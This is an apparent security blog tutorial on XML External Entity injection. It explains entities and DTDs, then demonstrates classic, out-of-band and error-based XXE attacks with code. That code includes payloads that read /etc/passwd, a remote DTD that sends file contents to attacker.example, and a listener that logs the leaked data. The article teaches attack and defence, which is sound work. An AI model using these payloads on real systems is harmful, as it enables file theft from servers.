Many different client technologies, such as web, mobile, cloud and more, send messages to business applications using XML. For the application to work with these self-descriptive XML messages, it has to parse them and check that the format is correct.
This article describes the XML External Entity (XXE) injection attack and its basics, to give you a better understanding of the attack and how to deal with it.
Since we will be talking about XXE injection, first we should understand the meaning of external entities and what they allow us to achieve.
External entities refer to data that an XML processor has to parse. They are useful for creating a common reference that can be shared between multiple documents. Any change made to an external entity is automatically reflected in the documents that reference it. In other words, XML uses external entities to fetch information, or “content”, into the body of the XML document.
To do this, we need to declare an entity inside the XML document. We can define its value internally (internal subset):
Or take it from an external source (external subset):
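Both forms can be sketched with Python's standard `xml.etree.ElementTree`. The entity names `author` and `page` and the path `/page.txt` are illustrative assumptions. ElementTree is a convenient choice here because it expands internal entities but raises a `ParseError` instead of fetching external ones, so nothing is requested from the network:

```python
import xml.etree.ElementTree as ET

# Internal entity: the value is written directly in the declaration.
INTERNAL = """<!DOCTYPE note [
  <!ENTITY author "Jane Doe">
]>
<note>&author;</note>"""

# External entity: SYSTEM points at a resource the parser would have to fetch.
# The path under site.com is a made-up placeholder.
EXTERNAL = """<!DOCTYPE note [
  <!ENTITY page SYSTEM "http://site.com/page.txt">
]>
<note>&page;</note>"""


def body_text(document):
    """Return the root element's text, or a note that parsing was refused."""
    try:
        return ET.fromstring(document).text
    except ET.ParseError as exc:
        return f"refused: {exc}"


print(body_text(INTERNAL))  # the reference is replaced by the entity's value
print(body_text(EXTERNAL))  # ElementTree refuses the external reference
```

A parser that does resolve external entities would replace `&page;` with whatever the remote page returns, and that is exactly the behavior XXE abuses.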
Noticed the SYSTEM identifier? This identifier means that the entity is going to fetch the content from an external source, which in this case is a page under “site.com”.
Great! So much for the purpose of entities… we’ll get back to it later.
To declare these entities, we need to do it inside a Document Type Definition (DTD). A DTD is a set of markup declarations that define a document type for XML (and also for HTML and SGML). It defines the legal building blocks of an XML document and the document structure, with a list of legal elements and attributes. A DTD can be declared inside an XML document, or as an external reference that uses the SYSTEM identifier to point to another set of declarations in a resolvable location.
Let’s see an example of a DTD, and an entity with a SYSTEM identifier inside the DTD:
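As a rough illustration (the element names, the `footer` entity and the `site.com` paths are all assumptions made for this sketch), here is a DTD declared inside the document next to one that is only referenced with SYSTEM. The helper uses the standard `xml.parsers.expat` handlers to report what each document declares, without fetching anything:

```python
from xml.parsers import expat

# DTD declared inside the document, including one entity with SYSTEM.
INLINE_DTD = """<!DOCTYPE note [
  <!ELEMENT note (to, body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
  <!ENTITY footer SYSTEM "http://site.com/footer.txt">
]>
<note><to>Bob</to><body>Hi</body></note>"""

# DTD kept elsewhere and only referenced through the SYSTEM identifier.
REFERENCED_DTD = """<!DOCTYPE note SYSTEM "http://site.com/note.dtd">
<note><to>Bob</to><body>Hi</body></note>"""


def describe_dtd(document):
    """Collect the DOCTYPE details and any external entities it declares."""
    info = {"external_entities": {}}
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        info["root"] = name
        info["dtd_location"] = system_id
        info["has_internal_subset"] = bool(has_internal_subset)

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # External entities carry no inline value, only a system identifier.
        if value is None:
            info["external_entities"][name] = system_id

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(document, True)
    return info


print(describe_dtd(INLINE_DTD))
print(describe_dtd(REFERENCED_DTD))
```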
And last but not least – the parameter entities!
This type of entity is declared with the “%” character (or an encoded %) and can be referenced only inside the DTD, where it is replaced by text or other content once it has been parsed and validated:
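A small sketch of the difference, assuming made-up entity names (`file`, `greeting`, `author`) and an arbitrary local path. expat's `EntityDeclHandler` tells us whether each declaration is a parameter entity (declared with `%`) or a general one:

```python
from xml.parsers import expat

DOCUMENT = """<!DOCTYPE note [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % greeting "Hello">
  <!ENTITY author "Jane Doe">
]>
<note>&author;</note>"""


def entity_kinds(document):
    """Map each declared entity name to 'parameter' or 'general'."""
    kinds = {}
    parser = expat.ParserCreate()

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kinds[name] = "parameter" if is_param else "general"

    parser.EntityDeclHandler = on_entity
    parser.Parse(document, True)
    return kinds


print(entity_kinds(DOCUMENT))
```

Parameter entities are referenced as `%name;` and only within the DTD, while general entities are referenced as `&name;` in the document body.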
I’m sure that many of you already got the idea of XXE attacks by now, and we haven’t even started yet! Well, it’s about time. 🙂
XXE attack overview and its techniques
The XML External Entity (XXE) attack is one of many injection-based attacks. It occurs when the attacker declares an external entity inside an XML message that is sent to an XML parser used by the application.
This vulnerability comes in many different types and behaviors, because it can occur in different technologies and therefore in different XML parsers. The beauty here is that every parser has different capabilities and “features”, so the exploitation can be very exciting.
Before we start, let’s define the most common types of XXE vulnerabilities we might face. Understanding the type helps us debug the attack and eventually build the right exploit:
- Classic XXE injection – external entity injection inside a local DTD.
- Blind XXE injection – no errors are shown by the XML parser in the response.
- Error-based XXE injection – the SAME response is always shown after a successful parse (e.g. “Your message has been received”), so we might want the parser to “print” the content of the files in its error responses.
As we saw in the overview, we can reference external data by using the SYSTEM identifier. So now we can introduce the first XXE injection technique: injecting into the XML document an external entity whose SYSTEM identifier references a local file path such as “/etc/passwd”:
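Here is a minimal sketch of that payload and of what a misconfigured parser does with it. The entity name `xxe`, the `message` element and the `FAKE_FILES` table are assumptions made for the sketch. pyexpat does not resolve external entities unless a handler is installed, so the code wires up `ExternalEntityRefHandler` by hand to imitate a vulnerable server, and it serves the "file" from an in-memory dictionary instead of touching the real filesystem:

```python
from xml.parsers import expat

# Stand-in for the target's filesystem (hypothetical content).
FAKE_FILES = {"file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash"}

PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<message>&xxe;</message>"""


def parse_like_vulnerable_server(document):
    """Parse the document while resolving external entities, then return its text."""
    chunks = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append

    def resolve(context, base, system_id, public_id):
        # Feed the referenced content to a child parser, as a resolving parser would.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(FAKE_FILES.get(system_id, ""), True)
        return 1

    parser.ExternalEntityRefHandler = resolve
    parser.Parse(document, True)
    return "".join(chunks)


print(parse_like_vulnerable_server(PAYLOAD))
```

If the application echoes the parsed `message` back in its response, the file's content comes back with it.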
Now let’s make a more complicated and severe attack:
- What if the application server doesn’t respond back, as part of its generic functionality? (Remember the blind XXE/error-based XXE we mentioned before?)
- What if we want to read data that contains XML special characters, so the result won’t be a well-formed XML document and would probably fail during parsing?
This is where we can load a secondary external DTD, which references our remote server and tries to fetch content from its URL. That content can be a set of characters or a dump of a file, like the example below. The greatest thing is that it doesn’t even go through the XML schema validation process, since it is sent BEFORE the parser even gets the remote content!
For example, here is the remote DTD file, containing parameter entities with a SYSTEM identifier and the “file” handler. Note that the parameter entity “file” is also concatenated to the URL inside the entity “send”:
After parsing that DTD, we get the following entity:
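The substitution can be sketched as follows. The DTD text is an assumed reconstruction: the wrapper entity `all`, the host `attacker.example` and the target path are placeholders, and `expand` is a toy text replacement that imitates how a DTD processor substitutes `%name;` references, not a real parser:

```python
import re

# Assumed contents of the remote DTD; attacker.example is a placeholder host.
REMOTE_DTD = """<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.example/?c=%file;'>">
%all;"""

PE_REFERENCE = re.compile(r"%([A-Za-z_][\w.-]*);")


def expand(text, parameter_entities):
    """Replace every %name; reference with that parameter entity's value."""
    return PE_REFERENCE.sub(lambda m: parameter_entities[m.group(1)], text)


def resulting_entity(file_content):
    """Return the declaration of 'send' once %file; has been substituted."""
    # 'file' holds whatever the parser read from the SYSTEM path.
    entities = {"file": file_content}
    # The value of 'all' is expanded when it is declared, pulling in %file;.
    raw_value = re.search(r'<!ENTITY % all "(.*)">', REMOTE_DTD).group(1)
    entities["all"] = expand(raw_value, entities)
    # Referencing %all; drops the finished declaration into the DTD.
    return expand("%all;", entities)


print(resulting_entity("root:x:0:0"))
```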
Finally, since the server tries to reach that URL with the content of the file sent as parameter “c”, we log the request and, by doing so, dump the file’s content:
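On our side, the logging can be as simple as the sketch below, built on Python's standard `http.server`. The port, the handler name and the helper `leaked_content` are assumptions for illustration; any web server with access logs would do the same job:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def leaked_content(request_path):
    """Pull the value of the 'c' query parameter out of a request path."""
    values = parse_qs(urlsplit(request_path).query).get("c", [])
    return values[0] if values else None


class LoggingHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record whatever the target's parser sent us, then answer politely.
        print("leaked:", leaked_content(self.path))
        self.send_response(200)
        self.end_headers()


def serve(port=8000):
    """Run the listener until interrupted; call this explicitly to start it."""
    HTTPServer(("0.0.0.0", port), LoggingHandler).serve_forever()
```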
Step B – the remote DTD is being parsed. We are stealing the content of the file …..
We got it!
A few things to remember with this technique:
- Character “#” in the file’s content will cause URL truncation.
- Since we delimit the parameter entity’s value with either ‘ or “, the same character inside the file’s content might break it. Which one breaks depends on the delimiter we used (so make sure you test both scenarios in case of an error).
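Both pitfalls are easy to reproduce offline. In this sketch the base URL and the sample contents are made up, and `system_literal` is a simplified regular expression that only imitates how a parser delimits the quoted SYSTEM literal:

```python
import re
from urllib.parse import urlsplit

BASE = "http://attacker.example/?c="  # placeholder exfiltration URL


def query_seen_by_server(file_content):
    """Everything after '#' becomes a URL fragment, so it drops out of the query."""
    return urlsplit(BASE + file_content).query


def system_literal(declaration):
    """Return the SYSTEM literal up to the first matching closing quote."""
    match = re.search(r"""SYSTEM\s+(['"])(.*?)\1""", declaration)
    return match.group(2)


# '#' in the content truncates what reaches our server.
print(query_seen_by_server("admin#1:x:1000"))

# A quote in the content ends a literal delimited by the same quote character.
single = "<!ENTITY send SYSTEM '" + BASE + "O'Brien'>"
double = '<!ENTITY send SYSTEM "' + BASE + "O'Brien" + '">'
print(system_literal(single))
print(system_literal(double))
```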
Error-based XXE injection
Sometimes we get only a generic response from the server when parsing succeeds, so we might want to rely on the detailed errors coming back from the server instead. We can use the same remote DTD technique, but make a deliberate error such as:
The parser will try to parse the DTD and access the path given in the “send” entity, and by failing to reach “my-evil-domain.$$$$” it will produce the following error:
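The idea can be imitated with a toy resolver. Everything here apart from the host “my-evil-domain.$$$$” is an assumption: the DTD layout, the `c` parameter, and above all the error text, which is produced by this sketch itself. Real parsers word their errors differently, but many of them quote the URL they failed to reach, and that URL already contains the file's content:

```python
import re
from urllib.parse import urlsplit

# Assumed variant of the remote DTD: the host is deliberately unresolvable.
ERROR_URL = "http://my-evil-domain.$$$$/?c=%file;"
ERROR_DTD = (
    '<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
    f"<!ENTITY % all \"<!ENTITY send SYSTEM '{ERROR_URL}'>\">\n"
    "%all;"
)

VALID_HOST = re.compile(r"[A-Za-z0-9.-]+")


def toy_fetch(url):
    """Stand-in for a parser's resolver: fail loudly, quoting the full URL."""
    host = urlsplit(url).hostname or ""
    if not VALID_HOST.fullmatch(host):
        raise OSError(f"could not resolve external entity {url!r}")
    return ""


def error_for(file_content):
    """Return the error text produced once %file; is substituted into the URL."""
    url = ERROR_URL.replace("%file;", file_content)
    try:
        toy_fetch(url)
    except OSError as exc:
        return str(exc)
    return None


print(error_for("root:x:0:0"))
```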
Debugging our own payload!
Note that any error returned by the server shows which line caused the parsing error. When our payload has syntax errors, we can sometimes use this information to debug it by inserting “\n”. For example:
<!DOCTYPE Author [\n
<!ENTITY %% deliberate_error_here "test"> ]>\n
The two extra “\n” that enclose the payload mean the error is reported on line 2, right after the first “\n”, while the rest of the XML content lands on line 3.
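The same trick can be tried locally with Python's `xml.parsers.expat`, which reports the line number of a parse error. The `<Author/>` element that closes each document is an assumption added so the sketch is complete; other parsers may report positions differently:

```python
from xml.parsers import expat


def error_line(document):
    """Return the 1-based line on which expat reports a parse error, if any."""
    parser = expat.ParserCreate()
    try:
        parser.Parse(document, True)
    except expat.ExpatError as exc:
        return exc.lineno
    return None


# Same broken declaration, first on a single line, then isolated by newlines.
ONE_LINE = '<!DOCTYPE Author [<!ENTITY %% deliberate_error_here "test"> ]><Author/>'
SPLIT = '<!DOCTYPE Author [\n<!ENTITY %% deliberate_error_here "test"> ]>\n<Author/>'

print(error_line(ONE_LINE))
print(error_line(SPLIT))
```

With everything on one line the error position says little, while the split version pins the problem to the line that holds only our injected declaration.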
In conclusion, XXE is a pretty powerful attack that allows us to manipulate misconfigured XML parsers and take advantage of them. Note that XXE injection makes more techniques and exploits possible. As I said before, every parser has different abilities, and therefore we can come up with different exploits:
Based on this table, presented by the researcher Timothy Morgan, these protocols can be used to upload files (jar://..), send arbitrary data over a TCP connection (gopher://..) in older versions of Java, read PHP source code using the PHP handler, and more.
Try it yourself by downloading our demo lab here! The demo contains a .NET XML parser with the XML payload, plus a remote DTD file in case it is needed.
For more information on how to prevent XXE attacks, click here.